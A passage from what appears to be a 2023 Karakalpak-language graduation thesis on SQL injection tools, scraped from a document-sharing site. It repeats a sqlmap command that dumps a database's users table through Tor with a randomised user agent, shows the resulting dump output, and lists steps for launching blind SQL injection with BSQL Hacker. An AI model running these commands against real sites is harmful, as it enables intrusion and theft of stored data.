$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor --dump -D testdb -T users --replicate

Bitiruv malakaviy ishi bitiruvchi: Satbaehamda G. Ilmiy rahbar: dots. Allamuratov Sh. Nukus 2023 mundarija


$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor --dump -D testdb -T users --replicate


Download 0.65 Mb.
bet22/29
Sana20.06.2023
Hajmi0.65 Mb.
#1637546
1   ...   18   19   20   21   22   23   24   25   ...   29
Bog'liq
Satbaeva

$ python sqlmap.py -u "http://www.site.com/vuln.php?id=1" --random-agent --tor --dump -D testdb -T users --replicate

Skanerge paydalanıwshılar kestesi ushın baǵana atların anıqlaw hám olardan barlıq jazıwlardı shıǵarıp alıw qıyın bolmaydı:




[02:11:26] [INFO] fetching columns for table 'users' on database 'testdb'
[02:11:26] [INFO] fetching entries for table 'users' on database 'testdb'
Database: testdb
Table: users
[4 entries]
+----+--------+------------+
| id | name | surname |
+----+--------+------------+
| 2 | fluffy | bunny |
| 3 | wu | ming |
| 1 | luther | blissett |
| 4 | NULL | nameisnull |
+----+--------+------------+
[02:11:27] [INFO] Table 'testdb.users' dumped to sqlite3 file
Sol tártipte biz SQLite formatında testdb.sqlite3 faylında maǵlıwmatlar bazası nusqasın alamız. Bul jaǵdayda biz SQLite múmkinshiliklerinen paydalanǵan halda (mısalı, SQLite Manager programmasınan) maǵlıwmatlardı kóriw menen sheklenip qalmastan, oǵan hár qanday sorawlardı orınlawımız múmkin.


BSQL Hacker
BSQL Hacker maǵlıwmatlar bazasınan maǵlıwmatlardı shıǵarıp alıwı ushın bir Qatar logıkalıq analiz qılıw usıllarınan paydalanadı.
BSQL Hacker – bul blind SQL den paydalanıw ushın mólsherlengen grafik quralı bolıp tabıladı. Bul programmalıq qural jańa apiwayı hámde ekspert paydalanıwshılar ushında arnalǵan. Hálsizlikti anıqlaw ushın onı eki avtomat hám avtomat bolmaǵan rejimlrtde isletiw múmkin

BSQL hacker programması interfeysi
SQL inekciyasıyanı ámelge asırıw basqıshları tómendegishe:
1. BSQL interfeysinde sazlaw bólimine ótiledi
2. Simvollar bóliminen belgilengen belgiler kiritiledi.
3. Keyin avtomatikalıq rejim saylanadı
4. Hújimdi ámelge asırıw ushin keying etapta maǵlıwmatlar bazası haqqńndaǵı flaglar alıp taslanadı.
5. Keyingi etapta Template-MySQL 5.0 + -Blind SQL Injection bólimi saylanadı.
6. Hújim baslaw múmkin, endi tek url adress kiritisek jetkilikli

Tómendegi url adress arqalı hújim ámelge asıramız





Download 0.65 Mb.

Do'stlaringiz bilan baham:
1   ...   18   19   20   21   22   23   24   25   ...   29



Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©fayllar.org 2024
ma'muriyatiga murojaat qiling